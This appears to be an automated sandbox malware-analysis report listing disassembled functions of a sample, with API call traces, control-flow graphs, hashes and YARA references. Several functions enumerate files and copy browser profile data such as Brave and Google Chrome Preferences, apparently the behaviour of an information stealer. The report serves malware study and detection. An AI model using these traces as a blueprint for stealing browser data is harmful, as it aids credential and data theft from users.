                                  Function 00FC8C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2895 fc8c88-fc8cc4 StrCmpCA 2897 fc8ccd-fc8ce6 2895->2897 2898 fc8cc6-fc8cc7 ExitProcess 2895->2898 2900 fc8cec-fc8cf1 2897->2900 2901 fc8ee2-fc8eef call fb2a20 2897->2901 2902 fc8cf6-fc8cf9 2900->2902 2904 fc8cff 2902->2904 2905 fc8ec3-fc8edc 2902->2905 2907 fc8dbd-fc8dcb StrCmpCA 2904->2907 2908 fc8ddd-fc8deb StrCmpCA 2904->2908 2909 fc8dfd-fc8e0b StrCmpCA 2904->2909 2910 fc8e1d-fc8e2b StrCmpCA 2904->2910 2911 fc8e3d-fc8e4b StrCmpCA 2904->2911 2912 fc8d5a-fc8d69 lstrlen 2904->2912 2913 fc8e56-fc8e64 StrCmpCA 2904->2913 2914 fc8d30-fc8d3f lstrlen 2904->2914 2915 fc8e6f-fc8e7d StrCmpCA 2904->2915 2916 fc8e88-fc8e9a lstrlen 2904->2916 2917 fc8d84-fc8d92 StrCmpCA 2904->2917 2918 fc8da4-fc8db8 StrCmpCA 2904->2918 2919 fc8d06-fc8d15 lstrlen 2904->2919 2905->2901 2945 fc8cf3 2905->2945 2907->2905 2936 fc8dd1-fc8dd8 2907->2936 2908->2905 2920 fc8df1-fc8df8 2908->2920 2909->2905 2921 fc8e11-fc8e18 2909->2921 2910->2905 2922 fc8e31-fc8e38 2910->2922 2911->2905 2923 fc8e4d-fc8e54 2911->2923 2932 fc8d6b-fc8d70 call fb2a20 2912->2932 2933 fc8d73-fc8d7f call fb2930 2912->2933 2913->2905 2926 fc8e66-fc8e6d 2913->2926 2930 fc8d49-fc8d55 call fb2930 2914->2930 2931 fc8d41-fc8d46 call fb2a20 2914->2931 2915->2905 2927 fc8e7f-fc8e86 2915->2927 2928 fc8e9c-fc8ea1 call fb2a20 2916->2928 2929 fc8ea4-fc8eb0 call fb2930 2916->2929 2917->2905 2935 fc8d98-fc8d9f 2917->2935 2918->2905 2924 fc8d1f-fc8d2b call fb2930 2919->2924 2925 fc8d17-fc8d1c call fb2a20 2919->2925 2920->2905 2921->2905 2922->2905 2923->2905 2954 fc8eb3-fc8eb5 2924->2954 2925->2924 2926->2905 2927->2905 2928->2929 2929->2954 2930->2954 2931->2930 2932->2933 2933->2954 2935->2905 2936->2905 2945->2902 2954->2905 2955 fc8eb7-fc8eb9 2954->2955 2955->2905 2956 fc8ebb-fc8ebd lstrcpy 2955->2956 2956->2905
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: 688b9e46a173a2d1c8cbcd75cda644d7680da76d79afe36909689607ad524be9
                                  • Instruction ID: a0a3eb2d3ed911b2fa71615164fb0333a608633f5c5663207a0df92ec463bfc7
                                  • Opcode Fuzzy Hash: 688b9e46a173a2d1c8cbcd75cda644d7680da76d79afe36909689607ad524be9
                                  • Instruction Fuzzy Hash: 68E0D825018389BBCB3897F68C9DDC37F9D8F44200B450429A6014B640E930DC46C36A

                                  Non-executed Functions

                                  Function 00FC2390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC23D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC23F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC2402
                                  • lstrlen.KERNEL32(\*.*), ref: 00FC240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00FC2436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FC2486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: 1c3c083583d69e093e9c72d67e344620bad40c38df888fa8ad99d133eb4737f8
                                  • Instruction ID: eb71dcef7aeb50056d7cf7147554b617b07d2b7266f1f21c9968953792ac0fb5
                                  • Opcode Fuzzy Hash: 1c3c083583d69e093e9c72d67e344620bad40c38df888fa8ad99d133eb4737f8
                                  • Instruction Fuzzy Hash: 2DA29D31D0021A9BDB65EFB5CD8AFAE77B9EF44714F044028B819A7245DB38DD41AFA0
                                  Function 00FB16A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB16E2
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB1719
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB176C
                                  • lstrcat.KERNEL32(00000000), ref: 00FB1776
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB17A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB17EF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB17F9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1825
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1875
                                  • lstrcat.KERNEL32(00000000), ref: 00FB187F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB18AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB18F3
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB18FE
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1909
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1929
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1935
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB195B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1966
                                  • lstrlen.KERNEL32(\*.*), ref: 00FB1971
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB198E
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00FB199A
                                    • Part of subcall function 00FD4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 00FD406D
                                    • Part of subcall function 00FD4040: lstrcpy.KERNEL32(00000000,?), ref: 00FD40A2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB19C3
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1A0E
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1A16
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1A21
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1A41
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1A4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1A76
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1A81
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1AAC
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1AB8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1ADE
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1AE9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1B11
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FB1B45
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FB1B70
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FB1B8A
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB1BC4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1BFB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1C03
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1C0E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1C31
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1C3D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1C69
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1C74
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1C7F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1CA2
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1CAE
                                  • lstrlen.KERNEL32(?), ref: 00FB1CBB
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1CDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB1CE9
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1CF4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1D14
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1D20
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1D46
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1D51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1D7D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1DE0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1DEB
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1DF6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1E19
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1E25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1E4B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB1E56
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1E61
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1E81
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB1E8D
                                  • lstrlen.KERNEL32(?), ref: 00FB1E9A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1EBA
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB1EC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1EF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB1F3E
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00FB1F45
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FB1F9F
                                  • lstrlen.KERNEL32(01B991C8), ref: 00FB1FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB1FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FB1FE3
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB1FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB200E
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FB2042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FB204D
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FB2058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FB2075
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FB2081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                  • String ID: \*.*
                                  • API String ID: 4127656590-1173974218
                                  • Opcode ID: 76322892e93d666e44da9eeb444637abdc1019ba82ed66e626a0aad31b399018
                                  • Instruction ID: 6517185ba3955270f45e3b6e046031ba7395f1fcb8d5fac2cda4bf27df9c1fa9
                                  • Opcode Fuzzy Hash: 76322892e93d666e44da9eeb444637abdc1019ba82ed66e626a0aad31b399018
                                  • Instruction Fuzzy Hash: 1292AE31D1121A9BDB61EFA6DC88AEE77B9BF44714F440124F819AB205DB38DD41EFA0
                                  Function 00FBDB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDBEF
                                  • lstrlen.KERNEL32(00FE4CA8), ref: 00FBDBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDC17
                                  • lstrcat.KERNEL32(00000000,00FE4CA8), ref: 00FBDC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDC4C
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDC8F
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FBDCD0
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FBDCF0
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FBDD0A
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FBDD1D
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDD7B
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDDA3
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDDAF
                                  • lstrlen.KERNEL32(?), ref: 00FBDDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FBDDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDE19
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBDE6F
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDE7B
                                  • lstrlen.KERNEL32(01B99078), ref: 00FBDE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDEBB
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBDEE6
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDEF2
                                  • lstrlen.KERNEL32(01B991E8), ref: 00FBDF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDFA5
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDFB1
                                  • lstrlen.KERNEL32(01B99078), ref: 00FBDFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDFF4
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE022
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBE02E
                                  • lstrlen.KERNEL32(01B991E8), ref: 00FBE03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBE06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 00FBE0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 00FBE0E7
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBE11F
                                  • lstrlen.KERNEL32(01B9D580), ref: 00FBE12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE155
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FBE15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE19F
                                  • lstrcat.KERNEL32(00000000), ref: 00FBE1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00FBE1F9
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBE22F
                                  • lstrlen.KERNEL32(01B991C8), ref: 00FBE23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE261
                                  • lstrcat.KERNEL32(00000000,01B991C8), ref: 00FBE269
                                  • lstrlen.KERNEL32(\Brave\Preferences), ref: 00FBE274
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE29B
                                  • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00FBE2A7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE2CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE30F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE349
                                  • DeleteFileA.KERNEL32(?), ref: 00FBE381
                                  • StrCmpCA.SHLWAPI(?,01B9D610), ref: 00FBE3AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE3F4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE41C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE445
                                  • StrCmpCA.SHLWAPI(?,01B991E8), ref: 00FBE468
                                  • StrCmpCA.SHLWAPI(?,01B99078), ref: 00FBE47D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE4D9
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00FBE4E0
                                  • StrCmpCA.SHLWAPI(?,01B9D550), ref: 00FBE58E
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBE5C4
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00FBE639
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE678
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE6A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE6C7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE70E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE737
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE75C
                                  • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00FBE776
                                  • DeleteFileA.KERNEL32(?), ref: 00FBE7D2
                                  • StrCmpCA.SHLWAPI(?,01B991B8), ref: 00FBE7FC
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE88C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE8B5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE8EE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE916
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 2635522530-726946144
                                  • Opcode ID: b95e1fab92a5661c7a8d5d9561071bd0be85bb322a3421a036d9dc9e7105e086
                                  • Instruction ID: 30d2ca1591ffb5d95ea6fa94de6740eff6f2d6043fcab4137939d36e6700e2c1
                                  • Opcode Fuzzy Hash: b95e1fab92a5661c7a8d5d9561071bd0be85bb322a3421a036d9dc9e7105e086
                                  • Instruction Fuzzy Hash: 5892A071D102099BDB64EFB6DC89AEE7BB9AF44310F044528F816AB244DB38DC45EF91
                                  Function 00FC18A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC18D2
                                  • lstrlen.KERNEL32(\*.*), ref: 00FC18DD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC18FF
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00FC190B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1932
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FC1947
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FC1967
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FC1981
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC19BF
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC19F2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC1A1A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC1A25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1A4C
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC1A5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1A80
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1AB4
                                  • lstrlen.KERNEL32(?), ref: 00FC1AC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1AE5
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC1AF3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1B19
                                  • lstrlen.KERNEL32(01B99298), ref: 00FC1B2F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1B59
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC1B64
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1B8F
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC1BA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1BC3
